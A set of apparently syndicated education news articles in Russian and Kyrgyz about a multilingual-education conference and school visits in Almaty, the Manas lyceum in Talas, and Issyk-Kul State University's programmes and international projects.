2-4 декабря делегация кыргызских педагогов побывала в г. Алматы и приняла участие в республиканской научно-практической конференции «Полифония языков в учебном процессе общеобразовательной школы: проблемы и перспективы», посвященной 20-летию Ассамблеи народов Казахстана. Организовал этот форум филиал АО «НЦПК «Өрлеу» ИПК ПР по городу Алматы.

 На пленарной  части конференции ее участников приветствовали  первый заместитель председателя правления АО «НЦПК «Өрлеу», д.п.н., профессор Ж. А.Караев, руководитель проектов ВКНМ ОБСЕ Михаэль Ангерман, региональный эксперт по образованию ВКНМ ОБСЕ Атанасия Стоянова и другие почетные гости. Они поблагодарили организаторов семинара за проведение столь важного мероприятия, а также за сотрудничество с 2005 года ИПК ПР по г. Алматы и ОБСЕ. Затем выступили с научными докладами д.п.н., директор ФАО НЦПК «Өрлеу» ИПК ПР по г. Алматы  Р.А. Садвакасова («Новый формат повышения квалификации педагогических кадров для полиязычного образования»), п.и.к., профессор К.К. Найманбаева и ряд других ученых, а также передовых учителей-методистов. На форуме звучали рефреном следующие слова Президента Казахстана Нурсултана Назарбаева: «Казахстан должен восприниматься во всем мире как высокообразованная страна, население которой пользуется тремя языками. Это казахский язык – государственный язык, русский язык – как язык межнационального общения и английский язык – язык успешной интеграции в глобальную экономику». Цитата взята из его послания народу республики под названием «30 важнейших направлений нашей внутренней и внешней политики», где он предложил начать поэтапную реализацию культурного проекта «Триединство языков».

«В тех школах, где внедряется программа многоязычного образования, знание учащихся по государственному, русскому и иностранному языкам улучшилось, качество знаний по предметам также повышается», — утверждают казахские педагоги. Все участники конференции убедились в этом сами, когда посмотрели открытые уроки местных учителей по новой методике. Например, в гимназии № 105 им. Джандосова г. Алматы учителя К.Кушенова (физика, 10 класс), М.Бекбатырова (математика, 8 класс), Ю.Пайсов (биология, 10 класс) и Д.Акимжанова (химия, 9 класс) провели уроки на двух языках – казахском (или русском) и английском. Следует отметить, что ученики владеют английским лучше своих учителей-предметников и относятся к этому совершенно спокойно. Ведь, самое главное, они имеют возможность закреплять свои знания по предметам на английском языке на основе кембриджской программы.

Кыргызский взгляд на опыт казахстанцев

Наша делегация приехала в Алматы работать – так можно характеризовать общий настрой участников конференции от Кыргызстана. Старались не пропускать ни одного важного высказывания, узнать, как удается им преодолевать трудности перехода к многоязычному образованию. Поэтому записывали ход открытых уроков и отмечали все необычное. Во время обсуждений делились своими впечатлениями. В целом оценивая очень высоко работу своих коллег, кыргызские педагоги старались увидеть и подводную часть айсберга, задавая вопросы местным методистам.

Дискуссия продолжилась и в гостинице – между собой. Региональный  эксперт по образованию ВКНМ ОБСЕАтанасия Стоянова и координатор направления «Многоязычное образование»  Центра социальной интеграции Надира Джусупбекова направляли ход разговора в конструктивное русло. Они добивались, чтобы наши учителя здесь высказывали не только восхищение, но и делились своими сомнениями.

Тут прозвучали и критические замечания по отдельным моментам уроков. Например, иногда учитель понятия на целевом языке сходу переводил на первый язык – этого не следует делать без острой необходимости. Если ученик забыл эквивалент термина на целевом языке, лучше использовать «говорящую стену», развешанную листами, на которых написаны понятия и их перевод.

Да, казахские коллеги впереди нас во многом, опыт у них по внедрению многоязычия богаче – они начинали значительно раньше нас. И экономические возможности государства другие. Но все же мы не должны копировать все подряд вслепую, к тому же в любом новом деле неизбежны ошибки. Не ошибается лишь тот, кто бездействует, но это и есть самая плохая, непростительная ошибка.

Интерес к новой программе в Кыргызстане усиливается, особенно после выступления Президента Алмазбека Атамбаева на III съезде учителей республики. «Желающих перейти к многоязычному обучению становится все больше, — сказала Н.Джусупбекова. — Но одного лишь желания, даже очень сильного, явно мало. Следует подходить к этому очень взвешенно, изучить контекст – понимание родителями важности дела, готовность учителей к трудностям, упорной, последовательной  работе. Нам предстоит последовательно и упорно трудиться, чтобы педагоги на практике освоили новую методику и целевой язык, перебороть неизбежные в такой ответственной работе трудности».

И наши, и казахские педагоги рады укреплять сотрудничество, учиться друг у друга всему самому лучшему и новому. К тому же у нас очень близкие, почти полностью идентичные языки, культура, менталитет, общие корни.

«Зерде» — путь к раскрытию потенциала

Частная школа «Zerde» дает многоязычное образование. Основной язык – казахский. Но уже с первого класса два урока ведется на английском, и в каждый последующий год добавляется по 1-2 предмета на целевом языке, например, в 7 классе – физика, в 8-9 классах – биология и т.д. Сверх обязательного государственного стандарта, здесь дают детям образование по кембриджской программе с соответствующей методикой.

Нас встретили небольшим концертом детского ансамбля. Оказалось, здесь все учащиеся умеют играть на домбре. «Это обязательное требование. Наши выпускники выйдут в большой мир, познакомятся с культурами других стран, будут общаться, сотрудничать с друзьями в разных концах планеты. И где бы они ни находились, мелодия домбры будет напоминать им родные просторы, звать в отчизну. Наша главная цель – воспитать настоящих патриотов Казахстана, готовых и способных служить родине не на словах, а на деле, приносить реальную пользу государству. Мы помогаем раскрыть интеллектуальный и личностный потенциал каждого учащегося наиболее полно. Программа многоязычного образования позволяет продолжить обучение в вузе на английском языке и достичь максимальных высот», — говорит директор школы Кулжан Садуева.

Обучение в этой школе стоит 50 тысяч тенге в месяц, записать своих детей в первый класс могут родители только на 2017 год – места на следующий год уже заняты полностью. Принимают сюда по результатам собеседования наиболее способных.

Затем присутствовали на обычных уроках. Наша группа выбрала географию в 3 классе. Катрин, учитель из Филиппин, ни слова не говорит по-казахски или по-русски и общается с детьми исключительно на английском. Она словно маленькое солнце – всем своим обликом она излучает луч доброты и понимания! При таком учителе даже самый робкий ребенок раскрывается всей душой и не боится ошибок. Каждый ответ непременно вызовет одобрение, восклицание восторженного педагога, аплодисменты всего класса. И дети тянутся к теплому свету знания об океанах, морях, озерах и реках, их сердца переполняются любовью в большой мир. Вот какие большие озера! А море, океан! Учитель весело изображает руками извилистое, мультиковое течение реки. Дети узнают и навсегда запомнят, какие есть моря и реки в их родном Казахстане.

Подвиг лидера-педагога или еще раз о реальном патриотизме

Во второй половине дня мы ознакомились с работой школы-гимназии № 153 им. Розыбакиева. Удивительную историю успеха рассказал директор Ш.Умаров:

- Нас никто не уговаривал, не заставлял выбрать многоязычное образование. Заставила сама жизнь. Лет десять назад единственная в городе школа с уйгурским языком обучения оказалась на грани закрытия, поскольку наши выпускники не могли участвовать в едином национальном тестировании из-за незнания казахского (или русского). А кто все же рискнул проверить свои знания, получил самый низкий балл. Тогда я узнал про новую программу и решил – это и есть именно то, что поможет нам выбраться из тупика. Взвесил все обстоятельства, возможности наших учителей и все больше убедился в правильности выбора. Но меня чуть не съела «оппозиция» наша, авторитетные представители уйгурской диаспоры. Среди них есть и остепененные ученые. Большинство активистов обвинила меня в предательстве, мол, этот директор отказывается от своих национальных корней и хочет поскорее ассимилировать подрастающее поколение в казахский народ.

Если бы не уверенность в своей правоте и поддержка учителей школы, я бы сломался. Все же нам удалось преодолеть сильнейшее противостояние «оппозиции», упорным, последовательным трудом приблизиться к главной цели. За десять лет мы прошли сложный путь…

Сейчас нашу школу признали как одну из лучших в городе. Занимаем первое место в районе на предметных олимпиадах, показатели на ЕНТ повысились резко. Наши выпускники поступают в престижные вузы республики, многие учатся в европейских университетах. Сегодня к нам просятся дети и других национальностей.

 

KLIL – ключ к успеху

В школе-гимназии № 153 организовали для участников конференции открытые уроки по методике KLIL (интегрированного обучения предмету и языку). Кыргызской делегации было особенно интересно посмотреть, как местным учителям удается проводить уроки на двух и более языках – родном для большинства детей уйгурском, государственном (казахском), русском и английском.

В рамках одного предмета используется не больше двух языков. Например, на уроке истории у Гузель Ражаповой дети свободно говорили на казахском и уйгурском, но учитель все же соблюдала твердую последовательность: опрос по домашнему заданию – на казахском, ознакомление нового материала – на уйгурском, закрепление – снова на казахском и т.д. Коллеги отметили высокий уровень мастерства и А.Сайпутулиной (информатика), А. Жалиловой (география), Г.Тохтахуновой (биология), а также учителей английского М. Самади и С. Джамиевой, которые помогали предметникам провести двуязычные уроки.

Учитель может увеличить свою зарплату на 100 процентов

 Одним из лучших достижений образования в Казахстане является модернизированная система повышения квалификации. Национальный центр ПК «Өрлеу» объединяет 17 институтов – все областные институты ПК, а также институты в Астане и Алматы. Центр педагогического мастерства, Назарбаев Интеллектуальные школы совместно с сотрудниками факультета образования Кембриджского университета разработали многоуровневые программы ПК учителей общеобразовательных школ Казахстана. К каждому уровню соответствуют свои требования. Например, третий (базовый) уровень предполагает апробацию учителем на своей педагогической практике идеи Кембриджской программы, а слушатель курсов второго уровня должен во время практики подготовить четыре открытых занятия для учителей школы совместно с обученным учителем данной школы по технологии названной программы. В зависимости от этих уровней (есть еще первый – продвинутый) учитель получит надбавку к своей зарплате от 30 до 100 процентов.

Приоритетные направления Программы состоят из семи модулей: новые подходы в преподавании и обучении, обучение критическому мышлению, оценивание для обучения и оценивание обучения, использование информационно-коммуникационных технологий в преподавании и обучении, обучение талантливых и одаренных детей.

http://bnews.kz/ru/news/obshchestvo/kazahstanskie_uchitelya_mogut_povisit_kvalifikatsiu_po_standartu_kembridzhskogo_universiteta-2013_04_15-671057

Жолдош Турдубаев, Бишкек – Алматы – Бишкек.

Фото Перуза Асилбек.

(Редакция выражает благодарность отделу по связям с общественностью ФАО НЦПК «Өрлеу» ИПК ПР по г. Алматы за помощь в уточнении отдельных сведений о деятельности образовательных программ в Казахстане)

«МАНАС»ЛИЦЕЙИНДЕГИ ЗАМАНБАП БИЛИМ Кыргыз Республикасынын Эл мугалими Жаныш Жанузаков жетектеген лицейде

$
0
0

Таластагы “Манас” лицейин жакшы деп  көп угабыз. Миӊ уккандан бир көргөн дегендей, мактоолордун баарын өз көзүбүз менен көрүп келели деп ошол касиеттүү Манас бабабыздын атын алып жүргөн лицейге жөнөп калдык. Төө-Ашуунун тайгак жолдорунда тыгынга туш болуп, кар учурган бороонуна кайыл болуп кышты кыш дебей сапарда бараткандар  бири-бирибиз менен аӊгеме-дүкөн кура баштадык.

- Жанатан телефон менен сүйлөшкөн кебиӊизге караганда журналист окшойсуз ээ, — деди сапарлашым кызыга суроо узатып. — Ооба, — дедим.

- Ушинтип суукка карабай кабар чогултат турбайсыздарбы, — деди тамашага салымыш болуп. Андан ары кебибиз дымып калды. Себеби тайгакта эптеп түз жолго чыкканды самап келаттык.  

Бишкектен кеч чыктык эле. Көөдөй караӊгыда Талды-Булактын түшө беришинде шопурдан Ак-Сайдагы “Манас”  лицейинен токтотуп коюсун сурандым. Жанымдагы сапарлашым ал жакка баратканымды угуп кеп улады.

- Сиз Жаныш агайдын мектебине бараткан турбайсызбы. Таластагы эӊ  мыкты лицей. Балдарыбызды ушул жерге окутабыз деп даярдап жүрөбүз. Бул жердин шарты сонун, мугалимдери мыкты, — деди. Машинеде бараткандар да ага кошулуп лицейди мактап киришти.

- Мен мактаганы деле бараткан жокмун. Көргөнү баратам, — дедим акырын. Журналисттерди жамандатып эле койсо болду дегенсишип унчукпай калышты. Ичимден элдин пикири тегин эмес экенине ынанып турдум.

Жол жээгиндеги мага тааныш Ак-Сайдагы мектепке караӊгыда келип түштүм. Бишкектеги мыкты мекемелердей тоголок лампалар менен жарык чачкан, тегереги зымпыйта тозулган бул мектепти  чын эле тааныбай турдум.

- Мени туурап бардык мектептер ушундай  лампа койдурабыз деп жатышат, — деди Жаныш агай күлүп. Агайдын үйү да мектебиндей жарык, шайма-шай экен.

 Жаныш агайды Таласта кимдер билбейт. Илгери 1992-жылы лицейине барсам мугалимдери менен бирге окуу жайдын алдындагы чөптөрүн жулуп, арыгын казышып жүрүптүр. Ал агай бул лицейди баладай асырап, канаттууга кактырбай, тумшуктууга чокутпай эрезеге жеткирди.

 - Эгемендүүлүктүн 24 жылында төрт жолу көчтүк. Жашырганда эмне, ошол “көчмөн” кезибизде билим жагынан бир аз аксадык. Топтоп алган мыкты мугалимдерим, окуучуларым ар кайсы жерде калып кетишти. Эми кайра өз айылыбыз “Манастагы” мектепке биротоло көчүп барып, мурдагы типтүү мектептин базасында лицей-интернат болдук. Иш көп. Мектеп биртоп жылдан бери каралбай калган экен. Демөөрчүлөрдү издеп жүрөм, — деди эле төрт жыл мурун мага жолугуп калып.

Мектебиӊиз тууралуу жазбайлыбы десем: — Биринчи иштейли, оӊололу, башкаларга көрсөтө турган артыкчылыгыбызды ишке ашыралы. Анан мактансак болот,- деген агайыбыз. Андан бери зуулдап беш жыл өтүп кетиптир. Беш жыл аралыгында  Жаныш агай мугалимдик кесипте 42 жыл, анын ичинде директорлук кызматта 31 жыл, лицейде 25 жыл талыкпай иштегени үчүн  КРнын Эл мугалими наамына татыктуу болду.  Ага чейин КРнын Эмгек сиӊирген мугалими наамын алды. “Жылдын Бакайы” аталды. — Жөжөнү күзүндө санай турган кез келди агай, — дедим күлүп. — Келе бергиле, мугалимдерим да, окуучуларым да чоӊоюп калышты. Моюн беришпейт, — деп күлдү. Адамдын  эмгегин айтыш үчүн азыркы заманда сыйлыктарын санап койгон жетишсиз. Жогоруда айтканымдай, элде ал киши жөнүндө эмне кеп бар, ошого да көӊүл буруш керек эмеспи. Жаныш агайдын атасы Буруш ушул мектепте мугалим болуп иштеп жүрүп, 41 жашында көзүөтүп кетиптир. Атасынан эрте ажырап, 8 бир тууганынын жоопкерчилигин мойнуна алып, ЖОЖду сырттан окуп, мектепте мугалим, сыртта чарба жумушу деп жүрүп, турмуштун ысык-суугун көп тартыптыр. Өмүрлүк жолдошу да башталгыч класстардын мугалими болуп жүрүп, эс алууга чыккан. Бир  тууганы, келини да мугалим. Жаныш агай үй-бүлөсүндө мугалимдердин династиясы улана берерине ишенет. Элде Жаныш агай тарбиялаган балдар мыкты адам болуп чыгышарына ишеним чоӊ.

Эртеси таӊкы төрттө туруп жүргөн Жаныш агайдан: «Таӊ атпай кайда барасыз, — десем – Котельныйди, (мектепти жылытуучу буу казандары) көрүп келейин. Сен жата бер. Азыр эрте, — деди. Агайдын иш күнү ушинтип төрттө эле башталат экен. Себеби лицей үйүнүн жанында, эки жүз метрдей эле.

- Мындай суукта баары бир теӊ, жылуулук бир теӊ го. Биздики интернат эмеспи. Балдар үшүбөсүн деп жылуулукту өзүм көзөмөлдөйм. От жаккан балдарды улам-улам барып карап турам, — дейт. Агай өзү жеринен аз уктайт экен. — Үч саат уктасам уйкум канып калат. Башынан аз уктайм, — деди агай. Куш уйкулуу дечүбеле… Айтор,  сергектик адамдын табиятынан болот эмеспи. Интернатты балдарга атасындай мамиле жасаган ушундай мээримдүү, камкор адам башкарыш керек экенин туюп турдум.

- Бул мектеп интернатка ылайыксыз салынган. Анын залдарын атайын пластиктер менен бөлүп, жатаканага айланттык. Жууна турган жайларды, туалеттерди мектептин ичине орноштурдук. Тийиштүү жерлердин баарына суу чыгардык. Мектептин ашканасын Россиядан берилген  акча каражатына 2014-жылы оӊдотуп чыктык. Жалпысынан ремонтко мамлекеттен, демөөрчүлөрдөн берилген алты миллион сом пайдаланылды, — дейт мектеп директору.

Жөнөкөй мектепти жатак мектепке айлантканга көп түйшүк кеткени кайра жасалган иштерден көрүнүп турат. “Бүткүл дүйнөлүк азык-түлүк” программасынын алкагында иш алып барышып, натыйжада 674 миӊ сомго эмеректер алынып, ысык, муздак суу чыгарылыптыр. Ашкана орду түбү менен оӊдолгон. Россиядан сатып алынган аппаратка алты минутада бир кап камыр жуурулуп, ачытылат экен. Спорт залы жаркырайт. Мектепте 1-4-класстагы 299 окуучуга шашке тамагын, жатак-мектептеги 150 окуучуга беш маал тамакты ашпозчулар убагында сапаттуу  даярдап турушат. Андагы афтоматташтырылган шарт мага жакты. Жатак мектептин окуучулары кофе, чай ичем десе атайын орнотулган таза суудан колдоно алышат. Биз көбүнчө чет  өлкөлөрдөгү мектептерди көрүп келип эле мактай беребиз. Андай мектептер бизде деле бар экен. Жанузак агай дүйнөдөгү мыкты тажрыйбаларды лицейде ишке ашырганга көп аракет кылаары көрүнүп турат. Мисалы, ал Арменияга барып келген соӊ,  мектеп менен ата-эненин ортосундагы байланышты катуу чыӊдаган. Кечээ жакында Жаныш агай “Роза Отунбаеванын демилгелери” аттуу эл аралык фонддун чакыруусу менен Түркия Республикасындагы мектептерди көрүп келиптир. Андагы жакшы тажрыйбаларды мугалимдер менен бирге бөлүшүп, жакшы жактарын өздөрүндө пайдаланалы дешүүдө. Өз казанында эле кайнай бербей дүйнөдөгү алдыӊкы педагогиканы, ыкмаларды ылайыгына жараша биздин менталитетке да киргизгиси келген мугалимдердин аракети жакшы натыйжаларды берет деп ойлойбуз. Мектепке келгендер: “Себатты” эле мактай беребиз, андай мектепти жаратыш биздин деле колдон келет турбайбы» — деп айтып кетишүүдө. Бул биз үчүн сыймык, — дейт мугалимдер. Акыйкатта, каражат жетпейт деп кол куушурбай мектептин материалдык-техникалык базасын заманбап талаптарга ылайык чыӊдоо үчүн түркүн долбоорлор менен иш алып барып, демөөрчүлөрдү таап, мыкты мугалим адистерди бир жерге топтоп, билим, тарбия жаатындагы иштерди натыйжалуу уюштура билген Эл мугалими Жаныш Жанузаковго мугалимдер жамааты тереӊ ыраазы экендиктерин жашырышкан жок.

Мектептин тегерегине видео көзөмөл орнотушуптур. — Рэкет, зомбулук деген балээден алыс бололу дедик. Кечке окуучулар мугалимдердин көз алдында болушат. Көп учурда окуучулар эмне болуп жатканын айтышпай жашырышат. Бирок мен баары бир билип алам. Метепке кай жактан балдар келип жатканын көрүп турам. Бир нерсе болсо өзүм изилдеп жөнөйм. Керек болсо Бишкектен да таап келем. Бир жолу  Бишкектеги спорт мектебине биздин айылдан барып окуп жаткан балдар каникулга чыкканда келип кетишиптир. Спорт мектебине барып жолуксам таӊ калышты. Мен баары бир билип алам. Ошондуктан мектепке келбегиле. Экинчи келип бейбаштык кылсаӊар мага таарынбагыла дедим. Алар кечирим сурашты. Мен тентектердин тилин таптым окшойт, келбей калышты. Былтыр бир балабызды башка балдар уруп коюшуптур. Сурасам, эч ким айтпайт. Бирок мен сураштырып жүрүп таап койдум. Алар таӊ калып, мага акча сунушташып жатпайбы. Мен «ооруканада жаткан балага жардам бергиле. Мага силердин акчаӊардын кереги жок. Эгер дагы ушундай кылсаӊар кечирим болбойт», — дедим. Бешинчи күнү намазга барган балдардын маселесин да чечип келдим. Мечиттеги молдолорго «силер шариятка баш ийсеӊер, мен билим берүү жана илим министрлигине, мыйзамдарга баш ийем» десем, алар мени туура түшүнүштү.

Чындыгында агай айткандай, мектепте тартип катуу экен. Болбосо коӊшу жайгашкан кесиптик техникалык (СПТУ) окуу жайдын өспүрүм балдары жайма-жай бул жакка кирип келчүдөй. Эки жакта теӊ ынтымак бардай. Таӊкалганым, окуучулар улууну көргөндө жол бошотуп, саамга токтой калышып: «Саламатсызбы?» — дешет. Көпчүлүк мектептерде, балким ушундайдыр. Бирок бул жерде өзгөчө жасалмасыз,  сени менен учурашканда окуучунун ичине орногон чыныгы ыйманды көрүп турасыӊ.

(Уландысы бар)

Майрамбек Токторов,

“Кутбилим”, Бишкек-Талас

К.ТЫНЫСТАНОВ АТЫНДАГЫ ЫМУ —ИНТЕЛЛЕКТУАЛДАР БЕШИГИ

$
0
0

 Байыркы Барсхан шаарында  төрөлгөн ойчул жана илимпоз Махмуд Кашкари  XI кылымда эле өзүнүн түзгөн географиялык картасына Ысык-Көл аймагын түшүрүп «Ааламдын чордону, дүйнөнүн борбору» деп бекер жеринен атабаптыр. Учурда ажайып көл аймагында илим, билимдин жана маданияттын борборуна айланган К.Тыныстанов атындагы ЫМУда көптөгөн ийгиликтүү иштер болуп жаткандыгын билип, аталган окуу жайдын жакында эле кайрадан ректору болуп шайланган, техника илимдеринин кандидаты, доцент, педагогикалык билим берүү илимдеринин Эл аралык академиясынын академиги, Кыргыз Республикасынын Инженердик академиясынын мүчө-корреспонденти, К.Тыныстанов атындагы ЫМУнун ардактуу профессору Абдылдаев Курманбек Кыянович менен жолугушуп, окуу жайдын учурдагы абалы менен жакындан тааныштык.

Бардык ийгилик жетекчиге байланыштуу

 1979-жылы Пржевальск педагогикалык институтунун математика факультетин ийгиликтүү аяктаган студент, азыр техника илимдеринин кандидаты, доцент, педагогикалык билим берүү илимдеринин Эл аралык академиясынын академиги, Кыргыз Республикасынын Инженердик академиясынын мүчө-корреспонденти, К.Тыныстанов атындагы ЫМУнун ардактуу профессору Абдылдаев Курманбек Кыянович 2010-жылдан баштап К.Тыныстанов атындагы ЫМУнун ректору болуп үзүрлүү эмгектенип, жалпы жамаат менен бирге окуу жайдын өнүгүү процессинде көптөгөн ийгиликтерди жаратты. Үстүбүздөгү жылдын  11-ноябрында болгон ректорлукка шайлоонун жыйынтыгы менен кайрадан аталган окуу жайга Кыргыз Республикасынын өкмөтү тарабынан ректор болуп бекитилди. “Жетекчинин жалпы жамааттын колдоосуна татышы, анын талбаган эмгегинин жана кызматкерлерге кылган калыс мамилесинин үзүрү”, — деген ойдобуз.

Рисунок2Билимдүүлөрдү учур өзү тандайт

Бул багытта ЫМУда замандын агымына, учурдун талабына ылайык бир катар маанилүү иштер жүрүүдө. Университет эки баскычтуу билим берүү системасына өткөн. Болон процессинин талаптарына ылайык окутуучулар менен студенттер үчүн байма-бай конференция, семинарлар өткөзүлүп Окутуунун кредиттик — ECTS системасы, билим берүүнүн сапатын жогорулатуу боюнча тынымсыз иштер жүргүзүлүүдө. Окуу процессин жакшыртуу, студенттердин билим деӊгээлин жогорулатуу үчүн заманбап технологиялар колдонулууда. Бул багытта ABN системасына өтүү, башкача айтканда, маалыматтарды борборлоштуруу жана окуу ишмердүүлүгүн башкарууну автоматташтыруу жана электрондоштуруу маселеси боюнча да келечектүү иштер аткарылды.

Азыркы мезгилде  окуу процесси  7 факультетте, 1 үзгүлтүксүз билим берүү борборунда, 1 техника-экономикалык колледжде,   22 кафедранын базасында жүргүзүлүүдө. Жалпы жамааттын талыкпаган эмгегинин натыйжасында 25 адистик жана 19 бакалавриат багытында 24 профиль боюнча жогорку квалификациялуу, замандын талабына жооп берген адистер даярдалууда. Ошондой эле 5 адистик боюнча магистратура ачылып, алгачкы магистрлерди даярдоо окуу процесси башталды. Евразия жогорку окуу жайлар союзунун алкагында бир катар адистиктер боюнча бакалавр жана магистр деӊгээлинде кош диплом берүү, аспирант, докторанттарды даярдоо боюнча Россия Федерациясы менен бирдикте макулдашылган окуу пландарын иштеп чыгуу маселелери чечиле баштады.

К.Тыныстанов атындагы ЫМУда түрдүү тармактар боюнча интеграциялык өнүгүүүчүн көптөгөн борборлор ачылып, учур талабына ылайык жогорку деӊгээлде иштеп жатат. Алар: Мамлекеттик тил борбору, Кыргыз-араб маданий борбору, Конфуций борбору, Илимий инновациялык борбор, Студенттерди колдоо жана өнүктүрүү борбору, HONOR мамлекеттик кызматкерлерди аралыктан окутуунун ресурстук борбору. Лингафондук кабинет жана ресурстук борбор, Туристтик маалымат борбору, “Толкун” маданий эстетикалык борбору, Инновациялык технологияларды жана квалификациялык чектерди жайылтуу борбору, Орус тилин окутуу борбору, Табигый илимдер боюнча программаларды даярдоо борбору, Билим берүү процессин автоматташтыруу борбору, Билим берүүчү тюнинг борбору.

Илимий иштер — жогорку окуу жайынын негизги көрсөткүчү

Илимий иштер боюнча окуу жайда мамлекет тарабынан каржылануучу илимий иштерди күчөтүү, жаш илимпоздордун илим менен иштөөсүнө шарт түзүү жана көмөк көрсөтүү, илимий семинарларды өнүктүрүп өткөзүү. Эл аралык проектилер менен иштөөнү күчөтүү маселелери алдыдагы негизги максат катары пландаштырылган.

Университеттин базасында көптөгөн Эл аралык, Республикалык  масштабда илимий-практикалык конференциялар, семинарлар, тегерек столдор байма-бай уюштурулуп, өткөрүлүп турат. Акыркы беш жылдын ичинде университетте 12 эл аралык, 16 республикалык конференциялар, элүүдөн ашык семинарлар, тегерек столдор уюштурулган. Аларда окулган илимий макалалардын көпчүлүгү республикабыздын Жогорку аттестациялык комиссиянын тизмесине киргизилген “Вестник Иссык-Кульского  университета” жана Бишкек гуманитардык университети менен биргеликте чыгарылып жаткан “Кыргыз тили жана адабияты” журналдарына чагылдырылат. Учурда окуу жайда 72 илимдин кандидаты, 10 илимдин доктору,  бардыгы 82 илимпоз жигердүү эмгектенүүдө. Акыркы эки жылда эле 4 изденүүчү  кандидаттык диссертациясын жактап, кесиптештерине үлгү көргөзүштү.

Билим алуу үчүн жаштар тарбиялуу болушу керек

“Окутуунун бир канаты тарбия” дегендей, тарбия иштери көп тармактуу көйгөйлөрдүн үстүндө иштеп жатат. Бул багытта студенттер интеллектуалдык билим деӊгээлин республикалык ар кандай кароо-сынактарга катышуу менен көргөзүп келишет.  Кийинки учурларда ЫМУнун дебат клубу Республикалык “Акыл таймаш” жана Кыргызстандагы ЖОЖдор аралык өткөрүлгөн «Жетинин бири» интеллектуалдык телетаймаштарга катышып биринчи орунду жеӊип келишүүдө. Быйыл жыл башында “Практикалык маркетинг жана логистика” деп аталган ЖОЖдор аралык 4-студенттик олимпиадага катышкан студенттер да байгелүү орунга ээ болуп, грамоталар менен сыйланышты. Кээ бир бүтүрүүчүлөр жана учурда окуп жаткан студенттер Президенттин стипендиясын алууда.  Ошондой эле студенттердин арасында олимпиадаларды, студенттик конференцияларды, илимий кружокторду жана башкаларды уюштурууга өзгөчө көӊүл бурулууда. Учурда студенттик уюмдун мүчөлөрү да бир катар заман талабына ылайык идеяларды ишке ашырууда. Окуу жайдын «Жалын» гезитинин 2013-жылдан баштап айына чыгышы, гезитке чыккан тарбиялык мааниси бар маалыматтардын таасири, студенттерди гана эмес окутуучуларды да шыктандырып, маалымат алмашуу булагына жана чыгармачылыктын мектебине айланды.

Окуу жайдын тарбия иштери боюнча келечектүү пландар иштелип чыккан. Алардын негизгилерине токтолсок, төмөнкүлөр: университеттин жалпы эмгек жамаатында эмгек тартибин бекемдөө жана ар бир кызматкердин аткарган милдеттерин көзөмөлгө алуу. Кыргыздын байыркы тарыхын, улуу дөөлөтүн, наркын, салтын, маданиятын, көркөм өнөрүн калыптандыруу менен бирге тарбиялык иштерди күчөтүү. Улуттар ортосундагы ынтымак, биримдикти сактоо боюнча иштерди алып баруу. Улуттук оюндарды киргизүү менен студенттерди спортко жана спорт маданиятына тарбиялоону өнүктүрүү. Студенттердин, окутуучулардын, кызматкерлердин социалдык маселелерине дайыма көз салып туруу жана чечүүгө көмөктөшүү. Студенттер арасында рэкетчиликке каршы иш алып баруу жана патриоттук тарбияга багыт берүүчү   иш-чараларды өткөрүү.

Студенттердин  бош убактысын туура пайдалануу, таланттуу студенттердин чыгармачылыгына шарт түзүү, студенттерди улуттук маданиятка, элибиздин тарыхына кызыктыруу, рухий дөөлөттөрдү даӊазалоо максатында университетте:

• “Жалын” студенттик элдик театры;

• КВНшиктер клубу;

• Дебат клубу;

• “Жаш толкун” жаш акындар клубу;

• Ырчылар студиясы иш алып барып,  ар кандай  маданий-массалык иш-чаралар өткөрүлүп турат. Быйылкы окуу жылында атайын ийрим жетекчилерине штат бөлүнүп, комузчулар жана бийчилер ийримдери иштей баштады. Учур талабына ылайык терроризм маселеси боюнча семинарлар жана кураторлук сааттар өткөзүлүүдө. Буюрса жаӊы жылдан баштап улуттук каада-салттарды, улуттук өнөрлөрдү жаштарга үйрөтүү максатында салтка айланган “Сармерден”, “Ыр-кесе”, “Мурас” сыяктуу тарбиялык долбоорлор ишке ашырылмакчы.

Спорт – студенттердин кызыкчылыгы

Спорт боюнча студенттер маданий-массалык спорттук мелдештерге жигердүү катышып, чет өлкөлөргө барышып, көптөгөн сыйлыктардын ээси болушууда. Кээ бир сыймыктуу мисалдарга токтолсок, ушул жылы эле апрель айында Бишкек шаарында жогорку окуу жайларынын арасында өткөрүлгөн универсиадага «Дене-тарбия жана аны окутуунун усулу кафедрасынын» окутуучулары жана  студенттери  жигердүү катышышып, жалпы жыйынтыгында өз тайпасында биринчи орунду ээлешип, атайын кубоктор жана грамоталар, акчалай сыйлыктын сертификаты менен сыйланышып, окуу жайдын желегин желбиретишти.

Окуу жайда Б.Сабатаров, С.Аматов, Т.Кулчунов, Е.Проскуракова, Е.Исакова сыяктуу эл аралык класстагы машыктыруучулар, ондогон спорттун чеберлери эмгектенет. Алардан тарбия алган Абдумомунов  Айбек, Сулайманбек уулу Акжол, Аблашымов Алтынбек, Балан Руслан сыяктуу студенттерибиз бир нече жолку эл аралык жана өлкөбүздөгү мелдештердин чемпиону жана спорттун чеберлери болушту.

Борбордон алыс жайгашкан окуу жайдагы эл аралык байланыш

Аймактык окуу жай болсо дагы, учурдун талабына ылайык К.Тыныстанов атындагы Ысык-Көл мамлекеттик университетинин эл аралык байланыштар боюнча ишмердүүлүгү жогорку деӊгээлде. 2015-жыл ЫМУ үчүн эл аралык ишмердүүлүк багытында жакшы жыйынтыктарды алып келди. Университеттин гранттар менен иш алып баруусу жакшы жолго коюлуп, долбоорлордун негизинде акыркы үч жылдын ичинде 200дөн ашуун студент, окутуучу чет мамлекеттерде тажрыйба алмашып, билим алууга жетишти.

Бүгүнкү күндө ТЕМПУС – жогорку билим берүүнү модернизациялоо программасы боюнча 7 эл аралык долбоор, Эрасмус мундус долбоору боюнча 2 долбоор жана Норвегиянын билим берүү агенттигинин 2 долбоору, Меvlana долбоору боюнча эки протокол, Эл аралык илимий-техникалык борбордун 1 долбоору иштеп жатат. Андан сырткары Конфуций борборун колдоо боюнча Конфуций институтунун 1 долбоору, Кыргыз-араб борборунун өнүгүүсү боюнча 1 долбоор иштейт.

2013-жылкы Темпус Улуттук офисинин координаторунун маалымдамасына ылайык, ЫМУ 1 орунда. Темпус долбоорлору токтогондугуна байланыштуу бул программанын тарыхында ЫМУ бул денгээлде кала бермекчи.

Жылдан-жылга долбоорлордун иштеп чыгаруу саны да көбөйүүдө. 2014-жылдан тартып Темпус жана Эрасмус Мундус программалары Эрасмус+ деген программага өтүүсү менен жаӊы долбоор жазуу этабы башталып, ЫМУ кайрадан долбоорлордун саны боюнча биринчи орунга чыкты.

